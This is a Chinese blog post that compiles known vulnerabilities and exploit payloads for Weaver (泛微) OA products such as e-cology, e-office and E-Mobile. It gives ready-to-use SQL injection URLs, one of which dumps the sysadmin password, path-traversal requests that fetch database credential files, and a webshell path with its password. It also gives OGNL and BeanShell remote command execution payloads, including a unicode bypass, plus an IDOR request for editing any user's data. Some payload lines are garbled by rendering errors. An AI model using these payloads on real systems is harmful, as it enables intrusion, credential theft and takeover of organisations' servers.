泛微 漏洞汇总

最新推荐文章于 2024-05-23 15:57:40 发布
最新推荐文章于 2024-05-23 15:57:40 发布
阅读量6.8k 收藏 8
点赞数 1
分类专栏: 泛微漏洞 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39541626/article/details/106012157
版权

SQL注入

前台SQL注入

用户名:admin’ or password like ‘c4ca4238a0b923820dcc509a6f75849b’ and ‘a’='a

密码: 1

验证页面参数 - loginid

(1)/login/VerifyLogin.jsp?loginfile=%2Fwui%2Ftheme%2Fecology7%2Fpage%2Flogin.jsp%3FtemplateId%3D41%26logintype%3D1%26gopage%3D&logintype=1&fontName=%CE%A2%C8%ED%D1%C5%BA%DA&message=&gopage=&formmethod=get&rnd=&serial=&username=&isie=false&loginid=test&userpassword=11111111111&tokenAuthKey=&islanguid=7&submit=

(2)/login/VerifyLogin.jsp?loginfile=%2Flogin%2Flogin.jsp%2F%3FtemplateId%3D11%26logintype%3D1%26gopage%3D&logintype=1&fontName=%CE%A2%C8%ED%D1%C5%BA%DA&message=&gopage=&formmethod=post&rnd=&serial=&username=&isie=false&loginid=test&userpassword=1111111111111&tokenAuthKey=&islanguid=7&submit=

未授权访问页面

//services/ 存在注入

/ws/ 存在注入

(3)

/weaver/weaver.file.SignatureDownLoad?markId=1 --参数markld

后台SQL注入

(1)

首先用使用测试账户登录,然后访问

http://xx.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=123&SORT_ID=166&func_id=&operationType=editFromRead&docStr=

其中的CONTENT_ID参数能够注射SQL语句。

http://xx.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=-4%20union%20select%201,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19%23&SORT_ID=166&func_id=&operationType=editFromRead&docStr=
(2)
管理员情况下的注入:http://www.e-cology.cn/systeminfo/sysadmin/sysadminEdit.jsp?id=1
普通用户注入:http://127.0.0.1//cowork/CoworkLogView.jsp?id=151
普通用户注入地址:http://127.0.0.1/system/basedata/basedata_role.jsp?roleid=32
普通用户注入地址:http://127.0.0.1//system/basedata/basedata_hrm.jsp?resourceid=3

(3)

/list.do?module=2&scope=5#1
(4)

http://.../hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1

任意文件下载

测试链接 http://eoffice8.weaver.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=index.php&ATTACHMENT_ID=5402024843

其中,参数 ATTACHMENT_NAME 未有效的控制其范围,导致任意文件下载

配置文件下载(程序zend加密,在网站http://www.showmycode.com/中可以解密)

http://xx.xx.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=…/…/inc/oa_config.php&ATTACHMENT_ID=5402024843

数据库连接文件下载

http://xx.xx.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=…/…/mysql_config.ini&ATTACHMENT_ID=5402024843

文件上传
http://xx.xx.cn:8028/attachment/2506423447/conf1g.php4 密码是8(system权限)

数据库后台访问
http://xx.xx.cn:8028/
phpmyadmin/

认证缺陷-绕过登录限制进入后台
则可注入的网址为 http://xx.xx.cn:8028/building/urlurl.php 直接访问显示access denied,
使用hackbar。post内容中,url为general/index.php,smsid为注入sql,内容为1 union select ‘1’,‘1’,‘admin’,‘1’,‘1’,‘1’,‘1’,‘1’,‘1’,‘1’,‘1’,‘1’,‘1’,‘1’,两者都经过DES3加密后再经过base64转码,点击excute…

数据库操作

/ws/query/

泛微eteams_oa系统越权修改任意用户信息

抓包得到一个链接:
https://www.eteams.cn/profile/summary/8005824116863355409.json?_=1408094249509
这时候我们记住8005824116863355409这个东西
我们修改本用户资料处:

我们修改一下电话,然后抓包并且把里面的employee.id替换为8005824116863355409为:
url:https://www.eteams.cn/base/employee/saveProperty.json
postdata:
employee.id=8005824116863355409&propertyName=telephone&employee.telephone=test

E-Mobile 4.5 RCE

.../verifyLogin.do
data:loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${@....IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘ipconfig’).getInputStream())}

http://.../verifyLogin.do
data: loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=KaTeX parse error: Expected 'EOF', got '&' at position 73: …oginid=CasterJs&̲password=Caster…{6666-2333}
.../verifyLogin.do
data: loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=KaTeX parse error: Expected 'EOF', got '&' at position 70: …oginid=CasterJs&̲password=Caster…{6666-2333}
http://.../verifyLogin.do
data: loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}

敏感文件泄露

/messager/users.data

/plugin/ewe/jsp/config.jsp

路径遍历

/plugin/ewe/admin/upload.jsp?id=11&dir=…/…/…/

/weaver/weaver.file.SignatureDownLoad?markId=1+union+select+’…/ecology/WEB-INF/prop/weaver.properties’

RCE

泛微e-cology OA Beanshell组件 RCE

CNNVD-201909-1041

Payload

bsh.script=exec('whoami');
 
>>>>unicode bypass
 
bsh.script=\u0065\u0078\u0065\u0063("whoami");

影响版本 泛微e-cology<=9.0

/weaver/bsh.servlet.BshServlet

exec(“whoami”) | dir(“c:/”) | cat(“c:/ee.txt”)
泛微e-cology OA系统某接口存在数据库配置信息泄露漏洞复现

看了下修补方案,似乎就是禁止访问/mobile/dbconfigreader.jsp这个页面

4.exp及利用

github上有现成的脚本

https://github.com/NS-Sp4ce/Weaver-OA-E-cology-Database-Leak

https://mp.weixin.qq.com/s/zTEUan_BtDDzuHzmd9pxYg

泛微敏感信息泄露

/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/prop/weaver.properties

泛微协同商务系统e-cology某处SQL注入(附验证中转脚本)
http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2016-0169453
泛微e-cology7.1 SOAP注入引发的血案
https://www.mrwu.red/web/1598.html

泛微OA WorkflowCenterTreeData接口注入漏洞复现
https://www.jianshu.com/p/16e237c026c7

qq_39541626
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】泛微ecology OA系统某接口存在数据库配置信息泄露漏洞
Summer's blog
05-13 1万+
泛微ecology OA系统某接口存在数据库配置信息泄露漏洞,复现的时候踩到的那些坑!经验分享与总结。
泛微最新漏洞汇总----实时更新!!,靠着这份900多页的PDF面试整理
m0_60666452的博客
04-07 834
title=“移动管理平台-企业管理”q=0.9!!
泛微最新漏洞汇总----实时更新!!!
yggcwhat
07-31 4075
泛微最新漏洞汇总
【nday】2023hvv 泛微漏洞合集
最新发布
伏一
05-23 620
【nday】2023hvv 泛微漏洞合集
泛微OA V8 SQL注入漏洞和文件上传漏洞
热门推荐
qq_52469895的博客
04-11 1万+
fofa语句 app="泛微-协同办公OA" SQL注入 在泛微OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法。其中它存在四个参数,分别为空字符串、cmd参数值、request对象以及serverContext对象,通过对cmd参数值进行判断,当cmd值等于getSelectAllId时,再从请求中获取sql和type两个参数值,并将参数传递进getSelectAllIds
漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞
qq_50854662的博客
03-20 7698
漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞
2021-泛微OA V8 SQL注入漏洞
weixin_43227251的博客
04-13 1万+
泛微OA V8 SQL注入漏洞 漏洞描述 泛微OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限 漏洞影响 泛微OA V8 FOFA app=“泛微-协同办公OA” 漏洞复现 在getdata.jsp中,直接将request对象交给 weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) : 方法处理 在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法 P
泛微E-Mobile 6.0命令执行漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
11-10 1149
泛微E-Mobile 6.0存在命令执行漏洞的问题,在某些情况下,用户的输入可能被直接传递给底层操作系统的命令执行函数,攻击者可以通过在输入中插入特殊字符或命令序列来欺骗应用程序将其作为有效命令来执行,从而获得服务器的命令执行权限。
泛微E-Office10远程代码执行漏洞
05-06
泛微E-Office 10确实存在远程代码执行漏洞,这个漏洞**可能导致严重的安全后果**。 该漏洞的关键在于系统处理上传的PHAR文件时存在的缺陷。攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的...
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
泛微ecology开发
05-27
泛微ecology开发】是企业信息化建设中的一个重要领域,主要涉及到的是泛微软件公司的产品——ECOLOGY系统的定制化开发和集成工作。这个主题涵盖了多个知识点,包括但不限于系统接口设计、开发工具的选择与配置、二...
泛微系统SQL语句大全
12-29
**泛微系统SQL语句大全** 在IT行业中,泛微系统是一种广泛应用的企业级协同办公软件,主要用于提升组织的管理效率和工作流程自动化。本资源集合了泛微系统中与SQL Server数据库交互时常用的各种SQL语句,涵盖了组织...
泛微e-cology OA Beanshell组件远程代码执行漏洞批量检测脚本
09-26
对2019年9月新爆的泛微e-cology OA Beanshell组件远程代码执行漏洞进行漏洞检测。 使用方法: 1、运行url存活检测脚本e-cology_OA_rce.py批量定位泛微OA业务。 e-cology_OA_rce.py –t 1.txt 2、运行检测脚本判断...
泛微ecology9 ofsLogin.jsp 信息泄露与前台任意用户登录漏洞分析
d59hao的博客
05-23 1238
在HrmResource表中loginid其实就是登录用户名,比如默认系统管理员的loginid就是sysadmin,想要接近loginid的判断逻辑有两个方法,第一种是syscode值在表中不存在,第二种是根据syscode查到的hrmtransrule必须"1",显然第一种更好利用一些。继续后面的逻辑,后面的逻辑就比较简单了,从查询到的结果中获取id并赋值给userid,然后根据userid生成认证凭证,也就是session,完成认证后就跳转到用户指定的页面,也就是接收到的gopage参数。
全网最强:泛微漏洞综合检测工具
bobo_patrick的博客
03-27 1146
全网poc最全、误报最少、漏洞利用方式最多的泛微漏洞综合检测工具
漏洞预警】泛微E-Cology ofsLogin任意用户登陆漏洞
做自己喜欢的事,并将其发挥到极致!
05-17 5069
泛微e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微e-cology前台任意用户登录漏洞泛微e-cology9部分版本中存在前台任意用户登录漏洞。该漏洞允许未经身份验证的攻击者通过发送构造的请求触发漏洞,成功利用此漏洞的攻击者可登录任意用户。
泛微最新漏洞汇总----实时更新!!!_泛微漏洞,2024年最新网络安全程序员必会
erthre的博客
04-16 1243
知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。(img-tih2xQ74-1713254808442)]app.name=“泛微 e-cology 9.0 OA”
泛微e-office系统存在SQL注入漏洞
holyxp的博客
11-02 825
泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。
泛微ecology文件搜索_紧急漏洞小心被黑:泛微BSH组件漏洞攻击及解决方案
weixin_39627390的博客
12-04 2060
泛微BSH组件漏洞攻击攻击者IP: 47.244.17.210Uri: /weaver/bsh.servlet.BshServlet//weaver/bsh.servlet.BshServlet/Content_type: application/x-www-form-urlencoded请求主体: bsh.script=eval%00%28%22ex%22%2B%22ec%28%5C%22msh...
泛微oabeanshell漏洞分析
09-05
泛微OABeanShell漏洞是指泛微OA系统中的一个安全漏洞泛微OA是一套常用的企业级办公自动化系统,用于管理企业的各种办公流程。这个漏洞是由于系统中的某个组件对外部用户提供了BeanShell脚本的执行功能,并没有进行严格的输入验证和安全控制,导致攻击者可以通过构造恶意的BeanShell脚本来执行任意代码,进一步攻击系统。 攻击者可以通过构造恶意的BeanShell脚本,利用该漏洞完成以下攻击行为: 1. 执行任意命令:攻击者可以在脚本中调用系统命令,获取系统敏感信息、篡改系统配置或者直接在系统上执行恶意操作。 2. 文件读取和写入:攻击者可以通过脚本读取或写入系统中的文件,获取系统的敏感数据或者破坏系统正常运行。 3. 注入其他脚本:攻击者可以通过在脚本中注入其他可执行脚本,进一步攻击系统或者获取更多权限。 4. 远程命令执行:攻击者可以通过构造脚本来连接到外部的攻击服务器,并执行攻击者指定的远程命令。 为了防止泛微OABeanShell漏洞的攻击,建议采取以下措施: 1. 及时更新系统补丁:泛微OA官方发布了解决此漏洞的补丁,要及时将补丁应用到系统中,以修复漏洞。 2. 限制BeanShell脚本的执行权限:系统管理员应该严格限制用户对BeanShell脚本的执行权限,只授权给必要的人员。 3. 输入验证和安全控制:系统应该对外部用户提交的BeanShell脚本进行输入验证和安全控制,防止恶意脚本的执行。 4. 强化系统安全防护:加强系统的安全防护措施,如入侵检测、安全审计等,以及定期进行漏洞扫描和安全评估。 综上所述,泛微OABeanShell漏洞是一种在泛微OA系统中存在的安全问题,攻击者可以通过构造恶意的BeanShell脚本来执行任意代码。为防止此漏洞的攻击,需要及时安装系统补丁,限制脚本执行权限,加强输入验证和安全控制,并强化系统的安全防护措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值